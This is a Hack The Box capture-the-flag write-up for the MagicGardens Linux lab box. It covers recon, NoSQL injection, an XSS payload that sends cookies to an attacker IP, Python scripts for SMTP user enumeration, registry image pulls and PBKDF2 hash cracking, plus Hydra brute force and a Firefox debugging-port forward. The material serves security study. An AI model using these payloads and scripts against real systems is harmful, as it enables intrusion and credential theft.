Hack The Box / LINUX / 2026-03-27
Hack The Box - MagicGardens (Linux)
NoSQL injection in the search endpoint, SMTP user enumeration followed by a password brute force against the Docker registry, credential recovery from the image's SQLite database, and enumeration of a root-owned headless Firefox remote-debugging port as the path to later-stage compromise.
Target
- IP: 10.129.233.100
Recon
sudo nmap -sC -sV 10.129.233.100 -p- -v -T5
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e0:72:62:48:99:33:4f:fc:59:f8:6c:05:59:db:a7:7b (ECDSA)
|_ 256 62:c6:35:7e:82:3e:b1:0f:9b:6f:5b:ea:fe:c5:85:9a (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Did not follow redirect to http://magicgardens.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, TerminalServer, TerminalServerCookie, X11Probe, afp, giop, ms-sql-s:
|_ [x] Handshake error
5000/tcp open ssl/http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-23T11:57:43
| Not valid after: 2024-05-22T11:57:43
| MD5: 2f97:8372:17ae:abe4:a4d9:5937:f438:3e71
|_SHA-1: a6f9:ce07:c808:150a:00aa:f193:1b72:a963:f414:f57c
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Port 80 redirects to http://magicgardens.htb/, so add "10.129.233.100 magicgardens.htb" to /etc/hosts.
Initial Web Enumeration
Check whether the registry catalog is readable anonymously:
curl -vv https://10.129.233.100:5000/v2/_catalog -k
The registry rejects the unauthenticated request and asks for credentials, so the catalog has to wait until a valid user/password pair is found.
Browse http://magicgardens.htb/, register an account, and log in.
Directory scan:
gobuster dir -u 'http://magicgardens.htb/' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -c 'sessionid=.eJxNiTEKg0AQRbeIouJBUgWSQ6RJmQPIuC64YFbY-UOqgAeYcryvQRtf9R5vKdbFHfzsqpVwyIk-wbREYNwff2EQhE2rNygNlAfT-ht57KbIMHWm7Z5-loSQ7eW09pRx_LHUdq_Tblj6jjzinEwvT4qTyW0Do28z6A:1s91Sl:B0aJjwzWk3LDcg65xxdGAuknmYF46y-cGz0MEnClw3U'
The scan finds an admin endpoint serving the Django administration login form, which identifies the backend as Django.
NoSQL Injection
Search endpoint example:
http://magicgardens.htb/search/?search=rose
By setting search to:
' || 1==1//
all flowers are returned, indicating NoSQL injection.
XSS test payload used against the application (exfiltrates document.cookie to the attacker host):
<img src=x onerror=this.src='http://10.10.16.25/?c='+document.cookie;>
SMTP User and Registry Credential Brute Force
SMTP user brute force script (attached):
attachments/brute_users.py
Recovered mail users:
- mail
- alex
- root
- news
Sending alex a message from the site leaves nothing in sent items, so alex is a mail user only, not a web-application user.
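The attached brute_users.py is not reproduced on the page. The following is an added example of the technique it implements, SMTP user enumeration via RCPT TO (with VRFY as the fallback that Postfix-style servers usually refuse with 252); it is not the writeup's script. Host, port, domain and wordlist are command-line arguments, and the FakeSmtp class is a constructed stand-in so the helpers can be exercised offline.

```python
"""SMTP user enumeration via RCPT TO / VRFY. Added example, not the
writeup's attachments/brute_users.py; host, port, domain and wordlist are
command-line arguments. The helpers only need readline()/write()/flush(),
so they run offline against the constructed FakeSmtp below."""
import socket
import sys


def read_reply(rfile):
    """Read one SMTP reply (multi-line replies use '250-'), return (code, text)."""
    lines = []
    while True:
        raw = rfile.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode("utf-8", "replace").rstrip("\r\n")
        lines.append(line[4:])
        if len(line) < 4 or line[3] != "-":  # 'NNN ' (or bare 'NNN') ends the reply
            return int(line[:3]), "\n".join(lines)


def command(rfile, wfile, cmd):
    """Send one command line and return the parsed reply."""
    wfile.write((cmd + "\r\n").encode())
    wfile.flush()
    return read_reply(rfile)


def probe_user(rfile, wfile, user, domain, method="RCPT"):
    """True if the server accepts the user, False if it rejects it, None if
    the method gives no answer (VRFY disabled -> 252, not implemented -> 502)."""
    if method == "VRFY":
        code, _ = command(rfile, wfile, f"VRFY {user}")
    else:
        command(rfile, wfile, "RSET")
        command(rfile, wfile, f"MAIL FROM:<probe@{domain}>")
        code, _ = command(rfile, wfile, f"RCPT TO:<{user}@{domain}>")
    if code in (250, 251):
        return True
    if code in (550, 551, 553):
        return False
    return None


def enumerate_users(rfile, wfile, candidates, domain, method="RCPT"):
    """Run the probe over a candidate list after the banner/EHLO; return accepted names."""
    read_reply(rfile)  # 220 banner
    command(rfile, wfile, f"EHLO {domain}")
    found = [u for u in candidates if probe_user(rfile, wfile, u, domain, method)]
    command(rfile, wfile, "QUIT")
    return found


class FakeSmtp:
    """Constructed stand-in for a Postfix-style server: VRFY answers 252,
    RCPT TO is 250 for known local users and 550 otherwise."""

    def __init__(self, known):
        self.known = set(known)
        self.pending = [b"220 fake.htb ESMTP\r\n"]

    def write(self, data):
        verb = data.decode().strip()
        if verb.upper().startswith("EHLO"):
            reply = "250-fake.htb\r\n250 PIPELINING\r\n"
        elif verb.upper().startswith("VRFY"):
            reply = "252 2.0.0 Cannot VRFY user\r\n"
        elif verb.upper().startswith("RCPT TO:"):
            user = verb.split("<", 1)[1].split("@", 1)[0]
            reply = "250 2.1.5 Ok\r\n" if user in self.known else "550 5.1.1 User unknown\r\n"
        elif verb.upper().startswith("QUIT"):
            reply = "221 2.0.0 Bye\r\n"
        else:
            reply = "250 2.0.0 Ok\r\n"
        self.pending.extend(reply.encode().splitlines(keepends=True))

    def flush(self):
        pass

    def readline(self):
        return self.pending.pop(0) if self.pending else b""


def main(host, port, domain, wordlist):
    with open(wordlist) as fh:
        candidates = [line.strip() for line in fh if line.strip()]
    with socket.create_connection((host, port), timeout=10) as sock:
        rfile, wfile = sock.makefile("rb"), sock.makefile("wb")
        for user in enumerate_users(rfile, wfile, candidates, domain):
            print(user)


if __name__ == "__main__":
    # python3 smtp_enum.py 10.129.233.100 25 magicgardens.htb names.txt
    host, port, domain, wordlist = sys.argv[1:5]
    main(host, int(port), domain, wordlist)
```

RCPT TO is used by default because it is honoured far more often than VRFY; a server that answers 250 for every recipient (catch-all) makes the list meaningless, which shows up as every candidate being "found".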
Registry password brute force script (attached):
attachments/brute_password.py
Alternative with Hydra (-S because port 5000 is TLS per the nmap output; -I skips the restore file):
hydra -l alex -P /usr/share/wordlists/rockyou.txt -s 5000 -S magicgardens.htb http-get /v2/_catalog -I
[5000][http-get] host: magicgardens.htb login: alex password: diamonds
Docker Registry Access
curl -k https://10.129.233.100:5000/v2/_catalog -u 'alex:diamonds' -vv
{"repositories":["magicgardens.htb"]}
curl -k https://magicgardens.htb:5000/v2/magicgardens.htb/tags/list -u 'alex:diamonds' -vv
{"name":"magicgardens.htb","tags":["1.3"]}
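The manifest and layer blobs can also be fetched straight from the registry API, without configuring dockerd or trusting the self-signed certificate. The following is an added example, not tooling from the writeup: it takes the registry URL, repository, tag and credentials shown above, writes blobs into a hypothetical layers/ directory, and verifies each blob against its content digest.

```python
"""Fetch an image's manifest and layers straight from a Docker Registry v2
endpoint over basic auth. Added example (not the writeup's tooling); the
registry URL, repository, tag and credentials are the ones from the page,
the output directory 'layers/' is hypothetical, and certificate checking
is disabled because :5000 presents a self-signed certificate."""
import base64
import hashlib
import json
import os
import ssl
import urllib.request

MANIFEST_ACCEPT = ", ".join([
    "application/vnd.docker.distribution.manifest.v2+json",
    "application/vnd.oci.image.manifest.v1+json",
])


def registry_get(base, path, user, password, accept=None):
    """GET base+path with HTTP basic auth; returns the raw body."""
    req = urllib.request.Request(base + path)
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    if accept:
        req.add_header("Accept", accept)
    ctx = ssl.create_default_context()
    ctx.check_hostname = False  # self-signed cert (see nmap ssl-cert output)
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx, timeout=60) as resp:
        return resp.read()


def parse_manifest(manifest_bytes):
    """Return (config_digest, [(layer_digest, size), ...]) for a schema-2 or
    OCI image manifest. A manifest list (multi-arch index) has 'manifests'
    instead of 'layers' and must be resolved to one platform first."""
    m = json.loads(manifest_bytes)
    if "layers" not in m or "config" not in m:
        raise ValueError(f"not an image manifest: mediaType={m.get('mediaType')}")
    return m["config"]["digest"], [(l["digest"], int(l.get("size", 0))) for l in m["layers"]]


def verify_blob(digest, data):
    """Content-address check: 'sha256:<hex>' must match the downloaded bytes."""
    algo, _, expected = digest.partition(":")
    return hashlib.new(algo, data).hexdigest() == expected


def blob_filename(digest, is_config=False):
    """Config blob is JSON; layer blobs are gzipped tar archives."""
    return digest.replace(":", "_") + (".json" if is_config else ".tar.gz")


def pull_image(base, repo, tag, user, password, outdir):
    """Download the config and every layer of repo:tag into outdir, verifying digests."""
    manifest = registry_get(base, f"/v2/{repo}/manifests/{tag}", user, password, MANIFEST_ACCEPT)
    config_digest, layers = parse_manifest(manifest)
    os.makedirs(outdir, exist_ok=True)
    todo = [(config_digest, True)] + [(d, False) for d, _ in layers]
    for digest, is_config in todo:
        data = registry_get(base, f"/v2/{repo}/blobs/{digest}", user, password)
        if not verify_blob(digest, data):
            raise RuntimeError("digest mismatch for " + digest)
        with open(os.path.join(outdir, blob_filename(digest, is_config)), "wb") as fh:
            fh.write(data)
    return config_digest, [d for d, _ in layers]


if __name__ == "__main__":
    cfg, layer_digests = pull_image("https://magicgardens.htb:5000", "magicgardens.htb", "1.3",
                                    "alex", "diamonds", "layers")
    print("config:", cfg)
    for d in layer_digests:
        print("layer :", d)
    # Extract each layer in manifest order into one directory to rebuild the rootfs.
```

Layers are listed base-first in the manifest, so extracting them in that order into a single directory reproduces the image filesystem closely enough to find files such as db.sqlite3 without ever running the image.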
Because the registry's certificate is self-signed, dockerd has to be told to accept it. Merge this into /etc/docker/daemon.json and restart the daemon (systemctl restart docker):
{
  "insecure-registries": ["magicgardens.htb:5000"]
}
Login and pull image:
docker login magicgardens.htb:5000
Use:
- Username: alex
- Password: diamonds
docker pull magicgardens.htb:5000/magicgardens.htb:1.3
docker save -o archive.tar magicgardens.htb:5000/magicgardens.htb:1.3
docker run -it magicgardens.htb:5000/magicgardens.htb:1.3
Inside the container, the application's Django SQLite database holds the web users (the auth_user row for morty has is_superuser=1 and is_staff=1):
sqlite3 db.sqlite3
.tables
select * from auth_user;
2|pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=|2023-06-06 17:34:56.520750|1|morty|||1|1|2023-06-06 17:32:24|
Crack the Django PBKDF2-SHA256 hash (600,000 iterations; hashcat mode 10000) with rockyou:
hashcat -m 10000 -a 0 ./hash ./rockyou.txt
pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo=:jonasbrothers
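To make the hash format and the cost of the attack concrete, the following added example parses and verifies Django's pbkdf2_sha256 encoding with hashlib alone and runs a small dictionary attack over it. It is not Django's or hashcat's code; the hash and the cracked value are the ones recovered above, and the low iteration count used for the fresh demo hash is only there to keep the demo fast.

```python
"""Parse, verify and dictionary-attack Django's pbkdf2_sha256 password
format ('pbkdf2_sha256$<iterations>$<salt>$<base64 digest>'). Added
example; it re-implements the hasher with hashlib only and is not
Django's or hashcat's code. RECOVERED is the morty hash from the page."""
import base64
import hashlib
import hmac
import secrets
import string

RECOVERED = "pbkdf2_sha256$600000$y1tAjUmiqLtSdpL2wL3h56$61u2yMfK3oYgnL31fX8R4k/0hTc6YXRfiOH4LYVsEXo="


def parse_django_pbkdf2(encoded):
    """Split the encoded form into (iterations, salt, raw digest bytes)."""
    algorithm, iterations, salt, b64 = encoded.split("$", 3)
    if algorithm != "pbkdf2_sha256":
        raise ValueError("unsupported algorithm " + algorithm)
    return int(iterations), salt, base64.b64decode(b64)


def django_pbkdf2_verify(password, encoded):
    """Constant-time comparison of PBKDF2-HMAC-SHA256(password, salt) with the stored digest."""
    iterations, salt, digest = parse_django_pbkdf2(encoded)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations, len(digest))
    return hmac.compare_digest(candidate, digest)


def make_django_pbkdf2(password, iterations=600000, salt=None):
    """Produce a hash in the same format (Django uses a 22-char alphanumeric salt)."""
    if salt is None:
        alphabet = string.ascii_letters + string.digits
        salt = "".join(secrets.choice(alphabet) for _ in range(22))
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2_sha256${iterations}${salt}${base64.b64encode(digest).decode()}"


def crack(encoded, candidates):
    """Dictionary attack: return the first candidate that verifies, else None.
    Every guess costs the full iteration count (600,000 HMAC rounds here),
    which is why hashcat -m 10000 on a GPU is the tool for rockyou-sized lists."""
    for word in candidates:
        if django_pbkdf2_verify(word, encoded):
            return word
    return None


if __name__ == "__main__":
    print("jonasbrothers verifies:", django_pbkdf2_verify("jonasbrothers", RECOVERED))
    # Low iteration count for the demo only; real Django 4.2 defaults are in the hundreds of thousands.
    fresh = make_django_pbkdf2("jonasbrothers", iterations=1000)
    print(fresh)
    print("cracked:", crack(fresh, ["password", "morty", "jonasbrothers"]))
```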
SSH and Process Enumeration
ssh morty@magicgardens.htb
ps aux
alex 1896 0.0 0.0 2464 880 ? S May20 0:00 harvest server -l /home/alex/.harvest_logs
root 1968 3.0 10.4 2992740 417308 ? Sl May26 26:34 firefox-esr --marionette --headless --remote-debugging-port 37513 --remote-allow-hosts localhost -no-remote -profile /tmp/rust_mozprofileK5fz8g
Firefox is running as root with --remote-debugging-port 37513 restricted to localhost (--remote-allow-hosts localhost), so forward that port to the attacker box over SSH:
ssh morty@magicgardens.htb -NL 37513:localhost:37513
The next exploitation step, against the forwarded remote-debugging port, is in the attached script:
attachments/exploit.py